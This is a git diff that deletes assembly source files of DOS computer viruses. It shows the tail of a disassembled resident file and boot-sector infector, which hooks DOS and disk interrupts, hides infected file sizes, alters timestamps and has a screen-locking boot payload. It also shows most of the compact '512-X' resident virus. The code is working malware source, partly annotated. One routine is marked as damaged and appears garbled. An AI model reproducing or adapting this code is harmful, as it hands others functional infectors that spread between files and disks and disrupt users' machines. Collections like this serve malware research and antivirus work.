(CS:12A3=0) - pop bx - retn -sub_9 endp - - -; -; SUBROUTINE -; - -sub_10 proc near - call sub_13 ; (0CC6) - push dx - mov dl,cs:data_52 ; (CS:1228=0) - mov ah,36h ; '6' - call sub_24 ; INT 21 - mul cx ; dx:ax = reg * ax - mul bx ; dx:ax = reg * ax - mov bx,dx - pop dx - or bx,bx ; Zero ? - jnz loc_53 ; Jump if not zero - cmp ax,4000h - jb loc_54 ; Jump if below -loc_53: - mov ax,4300h - call sub_24 ; INT 21 - jc loc_54 ; Jump if carry Set - mov di,cx - xor cx,cx ; Zero register - mov ax,4301h - call sub_24 ; INT 21 - cmp byte ptr cs:data_90,0 ; (CS:12DA=0) - jne loc_54 ; Jump if not equal - mov ax,3D02h - call sub_24 ; INT 21 - jc loc_54 ; Jump if carry Set - mov bx,ax - mov cx,di - mov ax,4301h - call sub_24 ; INT 21 - push bx - mov dl,cs:data_52 ; (CS:1228=0) - mov ah,32h ; '2' - call sub_24 ; INT 21 - mov ax,[bx+1Eh] - mov cs:data_101,ax ; (CS:12EC=0) - pop bx - call sub_14 ; (0D6C) - retn -loc_54: - xor bx,bx ; Zero register - dec bx - call sub_14 ; (0D6C) - retn -sub_10 endp - - -; -; SUBROUTINE -; - -sub_11 proc near - push cx - push dx - push ax - mov ax,4400h - call sub_24 ; INT 21 - xor dl,80h - test dl,80h - jz loc_55 ; Jump if zero - mov ax,5700h - call sub_24 ; INT 21 - test dh,80h -loc_55: - pop ax - pop dx - pop cx - retn -sub_11 endp - - -; -; SUBROUTINE -; - -sub_12 proc near - call sub_21 ; Save REGS in vir's stack - mov ax,4201h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - call sub_24 ; INT 21 - mov cs:data_78,ax ; (CS:12A5=0) - mov cs:data_79,dx ; (CS:12A7=0) - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - call sub_24 ; INT 21 - mov cs:data_80,ax ; (CS:12A9=0) - mov cs:data_81,dx ; (CS:12AB=0) - mov ax,4200h - mov dx,cs:data_78 ; (CS:12A5=0) - mov cx,cs:data_79 ; (CS:12A7=0) - call sub_24 ; INT 21 - call sub_20 ; Restore regs from vir's stack - retn -sub_12 endp - -_21_57: or al,al ; Zero ? - jnz loc_58 ; Jump if not zero - and cs:data_85,0FFFEh ; (CS:12B3=0) - call sub_19 ; Restore REGS - call sub_24 ; INT 21 - jc loc_57 ; Jump if carry Set - test dh,80h - jz loc_56 ; Jump if zero - sub dh,0C8h -loc_56: - jmp loc_11 ; (033F) -loc_57: - or cs:data_85,1 ; (CS:12B3=0) - jmp loc_11 ; (033F) -loc_58: - cmp al,1 - jne loc_61 ; Jump if not equal - and cs:data_85,0FFFEh ; (CS:12B3=0) - test dh,80h - jz loc_59 ; Jump if zero - sub dh,0C8h -loc_59: - call sub_11 ; (09E6) - jz loc_60 ; Jump if zero - add dh,0C8h -loc_60: - call sub_24 ; INT 21 - mov [bp-4],ax - adc cs:data_85,0 ; (CS:12B3=0) - jmp loc_13 ; (0396) -_21_42: cmp al,2 - jne loc_61 ; Jump if not equal - call sub_11 ; (09E6) - jz loc_61 ; Jump if zero - sub word ptr [bp-0Ah],1000h - sbb word ptr [bp-8],0 -loc_61: - jmp loc_10 ; (030F) -_21_3F: and byte ptr cs:data_85,0FEh ; (CS:12B3=0) - call sub_11 ; (09E6) - jz loc_61 ; Jump if zero - mov cs:data_83,cx ; (CS:12AF=0) - mov cs:data_82,dx ; (CS:12AD=0) - mov cs:data_84,0 ; (CS:12B1=0) - call sub_12 ; (0A04) - mov ax,cs:data_80 ; (CS:12A9=0) - mov dx,cs:data_81 ; (CS:12AB=0) - sub ax,1000h - sbb dx,0 - sub ax,cs:data_78 ; (CS:12A5=0) - sbb dx,cs:data_79 ; (CS:12A7=0) - jns loc_62 ; Jump if not sign - mov word ptr [bp-4],0 - jmp loc_25 ; (0549) -loc_62: - jnz loc_63 ; Jump if not zero - cmp ax,cx - ja loc_63 ; Jump if above - mov cs:data_83,ax ; (CS:12AF=0) -loc_63: - mov dx,cs:data_78 ; (CS:12A5=0) - mov cx,cs:data_79 ; (CS:12A7=0) - or cx,cx ; Zero ? - jnz loc_64 ; Jump if not zero - cmp dx,1Ch - jbe loc_65 ; Jump if below or = -loc_64: - mov dx,cs:data_82 ; (CS:12AD=0) - mov cx,cs:data_83 ; (CS:12AF=0) - mov ah,3Fh ; '?' - call sub_24 ; INT 21 - add ax,cs:data_84 ; (CS:12B1=0) - mov [bp-4],ax - jmp loc_13 ; (0396) -loc_65: - mov si,dx - mov di,dx - add di,cs:data_83 ; (CS:12AF=0) - cmp di,1Ch - jb loc_66 ; Jump if below - xor di,di ; Zero register - jmp short loc_67 ; (0B35) -loc_66: - sub di,1Ch - neg di -loc_67: - mov ax,dx - mov cx,cs:data_81 ; (CS:12AB=0) - mov dx,cs:data_80 ; (CS:12A9=0) - add dx,0Fh - adc cx,0 - and dx,0FFF0h - sub dx,0FFCh - sbb cx,0 - add dx,ax - adc cx,0 - mov ax,4200h - call sub_24 ; INT 21 - mov cx,1Ch - sub cx,di - sub cx,si - mov ah,3Fh ; '?' - mov dx,cs:data_82 ; (CS:12AD=0) - call sub_24 ; INT 21 - add cs:data_82,ax ; (CS:12AD=0) - sub cs:data_83,ax ; (CS:12AF=0) - add cs:data_84,ax ; (CS:12B1=0) - xor cx,cx ; Zero register - mov dx,1Ch - mov ax,4200h - call sub_24 ; INT 21 - jmp loc_64 ; (0B04) -_21_40: and byte ptr cs:data_85,0FEh ; (CS:12B3=0) - call sub_11 ; (09E6) - jnz loc_68 ; Jump if not zero - jmp loc_61 ; (0AA2) -loc_68: - mov cs:data_83,cx ; (CS:12AF=0) - mov cs:data_82,dx ; (CS:12AD=0) - mov cs:data_84,0 ; (CS:12B1=0) - call sub_12 ; (0A04) - mov ax,cs:data_80 ; (CS:12A9=0) - mov dx,cs:data_81 ; (CS:12AB=0) - sub ax,1000h - sbb dx,0 - sub ax,cs:data_78 ; (CS:12A5=0) - sbb dx,cs:data_79 ; (CS:12A7=0) - js loc_69 ; Jump if sign=1 - jmp short loc_71 ; (0C47) -loc_69: - call sub_13 ; (0CC6) - push cs - pop ds - mov dx,data_80 ; (CS:12A9=0) - mov cx,data_81 ; (CS:12AB=0) - add dx,0Fh - adc cx,0 - and dx,0FFF0h - sub dx,0FFCh - sbb cx,0 - mov ax,4200h - call sub_24 ; INT 21 - mov dx,4 - mov cx,1Ch - mov ah,3Fh ; '?' - call sub_24 ; INT 21 - mov ax,4200h - xor cx,cx ; Zero register - mov dx,cx - call sub_24 ; INT 21 - mov dx,4 - mov cx,1Ch - mov ah,40h ; '@' - call sub_24 ; INT 21 - mov dx,0F000h - mov cx,0FFFFh - mov ax,4202h - call sub_24 ; INT 21 - mov ah,40h ; '@' - xor cx,cx ; Zero register - call sub_24 ; INT 21 - mov dx,data_78 ; (CS:12A5=0) - mov cx,data_79 ; (CS:12A7=0) - mov ax,4200h - call sub_24 ; INT 21 - mov ax,5700h - call sub_24 ; INT 21 - test dh,80h - jz loc_70 ; Jump if zero - sub dh,0C8h - mov ax,5701h - call sub_24 ; INT 21 -loc_70: - call sub_14 ; (0D6C) - jmp loc_10 ; (030F) -loc_71: - jnz loc_72 ; Jump if not zero - cmp ax,cx - ja loc_72 ; Jump if above - jmp loc_69 ; (0BC9) -loc_72: - mov dx,cs:data_78 ; (CS:12A5=0) - mov cx,cs:data_79 ; (CS:12A7=0) - or cx,cx ; Zero ? - jnz loc_73 ; Jump if not zero - cmp dx,1Ch - ja loc_73 ; Jump if above - jmp loc_69 ; (0BC9) -loc_73: - call sub_19 ; Restore REGS - call sub_24 ; INT 21 - call sub_17 ; Save REGS - mov ax,5700h - call sub_24 ; INT 21 - test dh,80h - jnz loc_74 ; Jump if not zero - add dh,0C8h - mov ax,5701h - call sub_24 ; INT 21 -loc_74: jmp loc_13 ; (0396) - jmp loc_10 ; (030F) - -int_13: pop word ptr cs:data_65 ; (CS:1241=0) - pop word ptr cs:data_65+2 ; (CS:1243=0) - pop cs:data_91 ; (CS:12DB=0) - and cs:data_91,0FFFEh ; (CS:12DB=0) - cmp byte ptr cs:data_90,0 ; (CS:12DA=0) - jne loc_75 ; Jump if not equal - push cs:data_91 ; (CS:12DB=0) - call dword ptr cs:old_INT ; (CS:122D=0) - jnc loc_76 ; Jump if carry=0 - inc cs:data_90 ; (CS:12DA=0) -loc_75: stc ; Set carry flag -loc_76: jmp dword ptr cs:data_65 ; (CS:1241=0) - -int_24: xor al,al ; Zero register - mov byte ptr cs:data_90,1 ; (CS:12DA=0) - iret ; Interrupt return - -; -; SUBROUTINE -; - -sub_13 proc near - mov byte ptr cs:data_90,0 ; (CS:12DA=0) - call sub_21 ; Save REGS in vir's stack - push cs - pop ds - mov al,13h - call sub_1 ; Get INT 13 vector - mov word ptr old_INT,bx ; (CS:122D=0) - mov word ptr old_INT+2,es ; (CS:122F=70h) - mov word ptr old_INT_13,bx ; (CS:1239=0) - mov word ptr old_INT_13+2,es ; (CS:123B=70h) - mov dl,0 - mov al,0Dh - call sub_1 ; Get INT 0D vector - mov ax,es - cmp ax,0C000h - jae loc_77 ; Jump if above or = - mov dl,2 -loc_77: - mov al,0Eh - call sub_1 ; Get INT 0E vector - mov ax,es - cmp ax,0C000h - jae loc_78 ; Jump if above or = - mov dl,2 -loc_78: - mov data_73,dl ; (CS:1250=0) - call sub_22 ; Set INT 01 for debuging - mov data_92,ss ; (CS:12DD=151Ch) - mov data_93,sp ; (CS:12DF=0) - push cs - mov ax,offset loc_79 - push ax - mov ax,70h - mov es,ax - mov cx,0FFFFh - mov al,0CBh - xor di,di ; Zero register - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - dec di - pushf ; Push flags - push es - push di - pushf ; Push flags - pop ax - or ah,1 - push ax - in al,21h ; port 21h, 8259-1 int IMR - mov data_97,al ; (CS:12E5=0) - mov al,0FFh - out 21h,al ; port 21h, 8259-1 int comands - popf ; Pop flags - xor ax,ax ; Zero register - jmp dword ptr old_INT ; (CS:122D=0) -loc_79: - lds dx,old_INT_1 ; (CS:1231=0) Load 32 bit ptr - mov al,1 - call sub_27 ; Set INT 01 vector - push cs - pop ds - mov dx,offset int_13 - mov al,13h - call sub_27 ; Set INT 13 vector - mov al,24h - call sub_1 ; Get INT 24 vector - mov word ptr old_INT_24,bx ; (CS:123D=0) - mov word ptr old_INT_24+2,es ; (CS:123F=70h) - mov dx,offset int_24 - mov al,24h - call sub_27 ; Set INT 24 vector - call sub_20 ; Restore regs from vir's stack - retn -sub_13 endp - - -; -; SUBROUTINE -; - -sub_14 proc near - call sub_21 ; Save REGS in vir's stack - lds dx,dword ptr cs:old_INT_13 ; (CS:1239=0) Load 32 bit ptr - mov al,13h - call sub_27 ; Set INT 13 vector - lds dx,dword ptr cs:old_INT_24 ; (CS:123D=0) Load 32 bit ptr - mov al,24h - call sub_27 ; Set INT 24 vector - call sub_20 ; Restore regs from vir's stack - retn -sub_14 endp - - -; -; SUBROUTINE -; - -sub_15 proc near - mov ax,3300h ; Get CTRL-BREAK state - call sub_24 ; INT 21 - mov cs:data_94,dl ; (CS:12E1) save state - mov ax,3301h - xor dl,dl ; Set CTRL-BREAK = OFF - call sub_24 ; INT 21 - retn -sub_15 endp - - -; -; SUBROUTINE -; - -sub_16 proc near - mov dl,cs:data_94 ; (CS:12E1) - mov ax,3301h ; Restore CTRL-BREAK state - call sub_24 ; INT 21 - retn -sub_16 endp - - -; -; SUBROUTINE -; - -sub_17 proc near - pop cs:data_100 ; (CS:12EA=0) - pushf ; Push flags - push ax - push bx - push cx - push dx - push si - push di - push ds - push es - jmp word ptr cs:data_100 ; (CS:12EA=0) -sub_17 endp - - -; -; SUBROUTINE -; - -sub_18 proc near - les di,dword ptr cs:ptr_INT_21 ; (CS:1235=0) Load 32 bit ptr - mov si,offset data_70 ; (CS:124B=0) - push cs - pop ds - cld ; Clear direction - mov cx,5 - -locloop_80: - lodsb ; String [si] to al - xchg al,es:[di] - mov [si-1],al - inc di - loop locloop_80 ; Loop if cx > 0 - - retn -sub_18 endp - - -; -; SUBROUTINE -; - -sub_19 proc near - pop cs:data_100 ; (CS:12EA=0) - pop es - pop ds - pop di - pop si - pop dx - pop cx - pop bx - pop ax - popf ; Pop flags - jmp word ptr cs:data_100 ; (CS:12EA=0) - -; External Entry into Subroutine - -sub_20: - mov cs:data_114,offset sub_19 ; (CS:135D=0) Restore REGS - jmp short loc_81 ; (0DF6) - -; External Entry into Subroutine - -sub_21: - mov cs:data_114,offset sub_17 ; (CS:135D=0) Save REGS -loc_81: mov cs:data_112,ss ; (CS:1359=151Ch) - mov cs:data_111,sp ; (CS:1357=0) - push cs - pop ss - mov sp,cs:data_113 ; (CS:135B=0) - call word ptr cs:data_114 ; (CS:135D=0) - mov cs:data_113,sp ; (CS:135B=0) - mov ss,cs:data_112 ; (CS:1359=151Ch) - mov sp,cs:data_111 ; (CS:1357=0) - retn -sub_19 endp - - -; -; SUBROUTINE -; - -sub_22 proc near - mov al,1 - call sub_1 ; Get INT 01 vector - mov word ptr cs:old_INT_1,bx ; (CS:1231=0) - mov word ptr cs:old_INT_1+2,es ; (CS:1233=70h) - push cs - pop ds - mov dx,offset debug - call sub_27 ; Set INT 01 vector - retn -sub_22 endp - -_21_48: call sub_23 ; (0E3A) - jmp loc_10 ; (030F) - -; -; SUBROUTINE -; - -sub_23 proc near - cmp byte ptr cs:data_95,0 ; (CS:12E2=0) - je loc_ret_83 ; Jump if equal - cmp bx,0FFFFh - jne loc_ret_83 ; Jump if not equal - mov bx,160h - call sub_24 ; INT 21 - jc loc_ret_83 ; Jump if carry Set - mov dx,cs - cmp ax,dx - jb loc_82 ; Jump if below - mov es,ax - mov ah,49h - call sub_24 ; INT 21 - jmp short loc_ret_83 ; (0E8A) -loc_82: - dec dx - mov ds,dx - mov word ptr ds:MCB_0001,0 ; (7DBC:0001=275h) - inc dx - mov ds,dx - mov es,ax - push ax - mov cs:data_72,ax ; (CS:124E=7DBDh) - xor si,si ; Zero register - mov di,si - mov cx,all_len/2 - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - dec ax - mov es,ax - mov ax,cs:data_69 ; (CS:1249=0) - mov es:MCB_0001,ax ; (48FF:0001=0FFFFh) - mov ax,offset loc_ret_83 - push ax - retf -loc_ret_83: retn -sub_23 endp - -_21_37: mov byte ptr cs:data_104,2 ; (CS:12F0=0) - jmp loc_10 ; (030F) - -; -; SUBROUTINE -; - -sub_24 proc near ; calls INT 21 - pushf - call dword ptr cs:ptr_INT_21 ; (CS:1235=0) - retn -sub_24 endp - -boot: cli ; Disable interrupts - xor ax,ax ; Zero register - mov ss,ax - mov sp,7C00h - jmp short loc_85 ; (0EF4) - -data1 db 0dbh,0dbh,0dbh, 20h -data2 db 0f9h,0e0h,0e3h,0c3h - db 80h, 81h, 11h, 12h, 24h, 40h, 81h, 11h - db 12h, 24h, 40h,0F1h,0F1h, 12h, 24h, 40h - db 81h, 21h, 12h, 24h, 40h, 81h, 10h,0e3h - db 0C3h, 80h, 00h, 00h, 00h, 00h, 00h, 00h - db 00h, 00h, 00h, 00h, 82h, 44h,0F8h, 70h - db 0C0h, 82h, 44h, 80h, 88h,0C0h, 82h, 44h - db 80h, 80h,0C0h, 82h, 44h,0F0h, 70h,0C0h - db 82h, 28h, 80h, 08h,0C0h, 82h, 28h, 80h - db 88h, 00h,0F2h, 10h,0F8h, 70h,0C0h - -loc_85: push cs - pop ds - mov dx,0B000h - mov ah,0Fh - int 10h ; Video display ah=functn 0Fh - ; get state, al=mode, bh=page - cmp al,7 - je loc_86 ; Jump if equal - mov dx,0B800h -loc_86: - mov es,dx - cld ; Clear direction - xor di,di ; Zero register - mov cx,7D0h - mov ax,720h - rep stosw ; Rep when cx >0 Store ax to es:[di] - mov si,data2-boot+7C00h ; (CS:7C0E=0) - mov bx,2AEh -loc_87: - mov bp,5 - mov di,bx -loc_88: - lodsb ; String [si] to al - mov dh,al - mov cx,8 - -locloop_89: - mov ax,720h - shl dx,1 ; Shift w/zeros fill - jnc loc_90 ; Jump if carry=0 - mov al,0DBh -loc_90: - stosw ; Store ax to es:[di] - loop locloop_89 ; Loop if cx > 0 - - dec bp - jnz loc_88 ; Jump if not zero - add bx,0A0h - cmp si,loc_85-boot+7C00h - jb loc_87 ; Jump if below - mov ah,1 - int 10h ; Video display ah=functn 01h - ; set cursor mode in cx - mov al,8 - mov dx,loc_911-boot+7C00h - call sub_27 ; Set INT 08 vector - mov ax,7FEh - out 21h,al ; port 21h, 8259-1 int comands - ; al = 0FEh, IRQ0 (timer) only - sti ; Enable interrupts - xor bx,bx ; Zero register - mov cx,1 -loc_91: jmp short loc_91 ; SLEEP!!! -loc_911: dec cx ; INT 08 handler - jnz loc_92 ; Jump if not zero - xor di,di ; Zero register - inc bx - call sub_25 ; (0F67) - call sub_25 ; (0F67) - mov cl,4 -loc_92: - mov al,20h ; ' ' - out 20h,al ; port 20h, 8259-1 int command - ; al = 20h, end of interrupt - iret ; Interrupt return - -; -; SUBROUTINE -; - -sub_25 proc near - mov cx,28h - -locloop_93: - call sub_26 ; (0F93) - stosw ; Store ax to es:[di] - stosw ; Store ax to es:[di] - loop locloop_93 ; Loop if cx > 0 - -add1: add di,9Eh ; sub di,9Eh - mov cx,17h - -locloop_94: - call sub_26 ; (0F93) - stosw ; Store ax to es:[di] -add2: add di,9Eh ; sub di,9Eh - loop locloop_94 ; Loop if cx > 0 - -setd: std ; Set direction flag -_setd equ setd - boot + 7c00h - xor byte ptr ds:[_setd],1 ; (CS:7CE7=0) -_add1 equ add1 - boot + 7c01h - xor byte ptr ds:[_add1],28h ; (CS:7CD7=0) '(' -_add2 equ add2 - boot + 7c01h - xor byte ptr ds:[_add2],28h ; (CS:7CE2=0) '(' - retn -sub_25 endp - - -; -; SUBROUTINE -; - -sub_26 proc near - and bx,3 -_data1 equ data1 - boot + 7c00h - mov al,byte ptr ds:[_data1+bx] ; (CS:7C0A=0) - inc bx - retn -sub_26 endp - - -; -; SUBROUTINE -; - -sub_27 proc near - push es - push bx - xor bx,bx ; Zero register - mov es,bx - mov bl,al - shl bx,1 ; Shift w/zeros fill - shl bx,1 ; Shift w/zeros fill - mov es:[bx],dx - mov es:[bx+2],ds - pop bx - pop es - retn -sub_27 endp - - -; -; SUBROUTINE - *** DAMAGED BY STACK *** -; - -sub_28 proc near - call sub_13 ; (0CC6) - mov dl,1 - add [bp+si-4F2h],bl - pop es - jo $+2 ; Jump if overflow=1 - xor cx,word ptr ds:[32Eh] ; (0000:032E=0) - push di - sbb [bp+di],al - add byte ptr ds:[0],ah ; (0000:0000=5Bh) - add [bx+di],ah - add [bx+si+12h],dl - sbb dx,[bx] - loopnz $+11h ; Loop if zf=0, cx>0 - jnp $+23h ; Jump if not parity - db 0C1h, 02h, 31h, 41h, 7Ah, 16h - db 01h, 1Fh, 9Ah, 0Eh,0FBh, 07h - db 70h, 00h, 33h, 0Eh, 2Eh, 03h - db 57h, 18h, 57h, 1Fh,0A9h, 80h - db 00h, 00h, 57h, 1Fh -sub_28 endp - - org 1200h - -data_38 dw ? -data_40 dw ? -data_41 dw ?, ? -data_42 dw ? -data_43 dw ? -data_44 dw ? -data_45 dw ? -data_46 dw ?, ? -data_48 dw ? -data_49 dw ? - db 12 dup (?) -prm_blck_adr dw ?, ? -data_52 db ? -data_53 dw ? -data_54 dw ? -old_INT dd ? -old_INT_1 dd ? -ptr_INT_21 dd ? -old_INT_13 dd ? -old_INT_24 dd ? -data_65 dd ? -old_DS dw ? -data_68 dw ? -data_69 dw ? -data_70 db ? -data_71 dw ? -data_72 dw ? -data_73 db ? -data_74 db ? -data_75 db 50h dup (?) -data_76 db ? -data_77 dw ? -data_78 dw ? -data_79 dw ? -data_80 dw ? -data_81 dw ? -data_82 dw ? -data_83 dw ? -data_84 dw ? -data_85 dw ? -data_86 db 0Eh dup (?) -data_87 dw ? -data_88 dd ? - db ? -data_89 db 10h dup (?) -data_90 db ? -data_91 dw ? -data_92 dw ? -data_93 dw ? -data_94 db ? -data_95 db ? -old_AX dw ? -data_97 db ? -data_98 dw ? -data_99 dw ? -data_100 dw ? -data_101 dw ? -dos_ver db ? -data_103 db ? -data_104 db ? -exec_block db 0Eh dup (?) -data_106 dw ? -data_107 dw ? -entry_point dd ? -file_name db 50h dup (?) -data_111 dw ? -data_112 dw ? -data_113 dw ? -data_114 dw ? - -seg_a ends - - end - \ No newline at end of file diff --git a/0-9/512-X (11).ASM b/0-9/512-X (11).ASM deleted file mode 100755 index fbb9535..0000000 --- a/0-9/512-X (11).ASM +++ /dev/null @@ -1,304 +0,0 @@ -;NAME: 512-X.C-M -;FILE SIZE: 00200h - 512d -;START (CS:IP): 00100h -;CODE END: 00300h -;CODE ORIGIN: 00100h -;DATE: Wed Aug 05 13:56:29 1992 - -CODE SEGMENT BYTE PUBLIC 'CODE' -ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING - -P00100 PROC - ORG 0100h - -H00100: MOV AH,30h ;00100 B430 _0 - INT 21h ;2-DOS_Ver ;00102 CD21 _! - MOV SI,0004h ;00104 BE0400 ___ - MOV DS,SI ;DS_Chg ;00107 8EDE __ - CMP AH,1Eh ;00109 80FC1E ___ - LDS AX,[SI+08h] ;0010C C54408 _D_ - JB H0011B ;0010F 720A r_ - MOV AH,13h ;00111 B413 __ - INT 2Fh ;3-Prt_Splr_Ctrl ;00113 CD2F _/ - PUSH DS ;00115 1E _ - PUSH DX ;00116 52 R - INT 2Fh ;3-Prt_Splr_Ctrl ;00117 CD2F _/ - POP AX ;00119 58 X - POP DS ;0011A 1F _ -H0011B: MOV DI,00F8h ;0011B BFF800 ___ - STOSW ;0011E AB _ - MOV AX,DS ;0011F 8CD8 __ - STOSW ;00121 AB _ - MOV DS,SI ;DS_Chg ;00122 8EDE __ - LDS AX,[SI+40h] ;00124 C54440 _D@ - STOSW ;00127 AB _ - CMP AX,0121h ;00128 3D2101 =!_ - MOV AX,DS ;0012B 8CD8 __ - STOSW ;0012D AB _ - PUSH ES ;0012E 06 _ - PUSH DI ;0012F 57 W - JNZ H00139 ;00130 7507 u_ - SHL SI,1 ;00132 D1E6 __ - MOV CX,0100h ;00134 B90001 ___ - REPZ CMPSW ;00137 F3A7 __ -H00139: PUSH CS ;00139 0E _ - POP DS ;0013A 1F _ - JZ H00187 ;0013B 744A tJ - MOV AH,52h ;0013D B452 _R - INT 21h ;2-Rsvd_INT:21h-52h ;0013F CD21 _! - PUSH ES ;00141 06 _ - MOV SI,00F8h ;00142 BEF800 ___ - SUB DI,DI ;00145 2BFF +_ - LES AX,ES:[BX+12h] ;ES_Ovrd ;00147 26C44712 &_G_ - MOV DX,ES:[DI+02h] ;ES_Ovrd ;0014B 268B5502 &_U_ - MOV CX,0104h ;0014F B90401 ___ - REPZ MOVSW ;00152 F3A5 __ - MOV DS,CX ;DS_Chg ;00154 8ED9 __ - MOV DI,0016h ;00156 BF1600 ___ - MOV Word Ptr [DI+6Eh],0121h ;00159 C7456E2101 _En!_ - MOV [DI+70h],ES ;0015E 8C4570 _Ep - POP DS ;00161 1F _ - MOV [BX+14h],DX ;00162 895714 _W_ - MOV DX,CS ;00165 8CCA __ - MOV DS,DX ;DS_Chg ;00167 8EDA __ - MOV BX,[DI-14h] ;00169 8B5DEC _]_ - DEC BH ;0016C FECF __ - MOV ES,BX ;ES_Chg ;0016E 8EC3 __ - CMP DX,[DI] ;00170 3B15 ;_ - MOV DS,[DI] ;DS_Chg ;00172 8E1D __ - MOV DX,[DI] ;00174 8B15 __ - DEC DX ;00176 4A J - MOV DS,DX ;DS_Chg ;00177 8EDA __ - MOV SI,CX ;00179 8BF1 __ - MOV DX,DI ;0017B 8BD7 __ - MOV CL,28h ;0017D B128 _( - REPZ MOVSW ;0017F F3A5 __ - MOV DS,BX ;DS_Chg ;00181 8EDB __ - JB H00197 ;00183 7212 r_ - INT 20h ;B-TERM_norm:20h ;00185 CD20 _ -;--------------------------------------------------- -H00187: MOV SI,CX ;00187 8BF1 __ - MOV DS,[SI+2Ch] ;DS_Chg ;00189 8E5C2C _\, - LODSW ;0018C AD _ - DEC SI ;0018D 4E N - TEST AX,AX ;0018E 85C0 __ - JNZ H0018C ;00190 75FA u_ - ADD SI,+03h ;00192 83C603 ___ - MOV DX,SI ;00195 8BD6 __ -H00197: MOV AH,3Dh ;00197 B43D _= - CALL H001B0 ; . . . . . . . . . ;00199 E81400 ___ - MOV DX,[DI] ;0019C 8B15 __ - MOV [DI+04h],DX ;0019E 895504 _U_ - ADD [DI],CX ;001A1 010D __ - POP DX ;001A3 5A Z - PUSH DX ;001A4 52 R - PUSH CS ;001A5 0E _ - POP ES ;001A6 07 _ - PUSH CS ;001A7 0E _ - POP DS ;001A8 1F _ - PUSH DS ;001A9 1E _ - MOV AL,50h ;001AA B050 _P - PUSH AX ;001AC 50 P - MOV AH,3Fh ;001AD B43F _? - RET ;RET_Far ;001AF CB _ -;--------------------------------------------------- -H001B0: INT 21h ;Indef_INT:21h-AH ;001B0 CD21 _! - JB H001CD ;001B2 7219 r_ - MOV BX,AX ;001B4 8BD8 __ - PUSH BX ;001B6 53 S - MOV AX,1220h ;001B7 B82012 _ _ - INT 2Fh ;3-Prt_Splr_Ctrl ;001BA CD2F _/ - MOV BL,ES:[DI] ;ES_Ovrd ;001BC 268A1D &__ - MOV AX,1216h ;001BF B81612 ___ - INT 2Fh ;3-Prt_Splr_Ctrl ;001C2 CD2F _/ - POP BX ;001C4 5B [ - PUSH ES ;001C5 06 _ - POP DS ;001C6 1F _ - ADD DI,+11h ;001C7 83C711 ___ - MOV CX,0200h ;001CA B90002 ___ -H001CD: RET ;RET_Near ;001CD C3 _ -;--------------------------------------------------- - STI ;001CE FB _ - PUSH ES ;001CF 06 _ - PUSH SI ;001D0 56 V - PUSH DI ;001D1 57 W - PUSH BP ;001D2 55 U - PUSH DS ;001D3 1E _ - PUSH CX ;001D4 51 Q - CALL H001B6 ; . . . . . . . . . ;001D5 E8DEFF ___ - MOV BP,CX ;001D8 8BE9 __ - MOV SI,[DI+04h] ;001DA 8B7504 _u_ - POP CX ;001DD 59 Y - POP DS ;001DE 1F _ - CALL H00211 ; . . . . . . . . . ;001DF E82F00 _/_ - JB H0020A ;001E2 7226 r& - CMP SI,BP ;001E4 3BF5 ;_ - JNB H0020A ;001E6 7322 s" - PUSH AX ;001E8 50 P - MOV AL,ES:[DI-04h] ;ES_Ovrd ;001E9 268A45FC &_E_ - NOT AL ;001ED F6D0 __ - AND AL,1Fh ;001EF 241F $_ - JNZ H00209 ;001F1 7516 u_ - ADD SI,ES:[DI] ;ES_Ovrd ;001F3 260335 &_5 - XCHG SI,ES:[DI+04h] ;ES_Ovrd ;001F6 26877504 &_u_ - ADD ES:[DI],BP ;ES_Ovrd ;001FA 26012D &_- - CALL H00211 ; . . . . . . . . . ;001FD E81100 ___ - MOV ES:[DI+04h],SI ;ES_Ovrd ;00200 26897504 &_u_ - LAHF ;00204 9F _ - SUB ES:[DI],BP ;ES_Ovrd ;00205 26292D &)- - SAHF ;00208 9E _ -H00209: POP AX ;00209 58 X -H0020A: POP BP ;0020A 5D ] - POP DI ;0020B 5F _ - POP SI ;0020C 5E ^ - POP ES ;0020D 07 _ - RET 0002h ;RET_Far:0002h ;0020E CA0200 ___ -;--------------------------------------------------- -H00211: MOV AH,3Fh ;00211 B43F _? - PUSHF ;00213 9C _ - PUSH CS ;00214 0E _ - CALL H0023A ; . . . . . . . . . ;00215 E82200 _"_ - RET ;RET_Near ;00218 C3 _ -;--------------------------------------------------- - CMP AH,3Fh ;00219 80FC3F __? - JZ H001CE ;0021C 74B0 t_ - PUSH DS ;0021E 1E _ - PUSH ES ;0021F 06 _ - PUSH AX ;00220 50 P - PUSH BX ;00221 53 S - PUSH CX ;00222 51 Q - PUSH DX ;00223 52 R - PUSH SI ;00224 56 V - PUSH DI ;00225 57 W - CMP AH,3Eh ;00226 80FC3E __> - JZ H0023F ;00229 7414 t_ - CMP AX,4B00h ;0022B 3D004B =_K - MOV AH,3Dh ;0022E B43D _= - JZ H00241 ;00230 740F t_ - POP DI ;00232 5F _ - POP SI ;00233 5E ^ - POP DX ;00234 5A Z - POP CX ;00235 59 Y - POP BX ;00236 5B [ - POP AX ;00237 58 X - POP ES ;00238 07 _ - POP DS ;00239 1F _ -H0023A: JMP Word Ptr CS:[0004h] - ;Mem_Brch:CS:[0004h];0023A 2EFF2E0400 ._.__ -;--------------------------------------------------- -H0023F: MOV AH,45h ;0023F B445 _E -H00241: CALL H001B0 ; . . . . . . . . . ;00241 E86CFF _l_ - JB H00232 ;00244 72EC r_ - SUB AX,AX ;00246 2BC0 +_ - MOV [DI+04h],AX ;00248 894504 _E_ - MOV Byte Ptr [DI-0Fh],02h ;0024B C645F102 _E__ - CLD ;0024F FC _ - MOV DS,AX ;DS_Chg ;00250 8ED8 __ - MOV SI,004Ch ;00252 BE4C00 _L_ - LODSW ;00255 AD _ - PUSH AX ;00256 50 P - LODSW ;00257 AD _ - PUSH AX ;00258 50 P - PUSH [SI+40h] ;00259 FF7440 _t@ - PUSH [SI+42h] ;0025C FF7442 _tB - LDS DX,CS:[SI-50h] ;CS_Ovrd ;0025F 2EC554B0 ._T_ - MOV AX,2513h ;00263 B81325 __% - INT 21h ;1-Set_Int_Vctr ;00266 CD21 _! - PUSH CS ;00268 0E _ - POP DS ;00269 1F _ - MOV DX,0204h ;0026A BA0402 ___ - MOV AL,24h ;0026D B024 _$ - INT 21h ;Indef_INT:21h-25h ;0026F CD21 _! - PUSH ES ;00271 06 _ - POP DS ;00272 1F _ - MOV AL,[DI-04h] ;00273 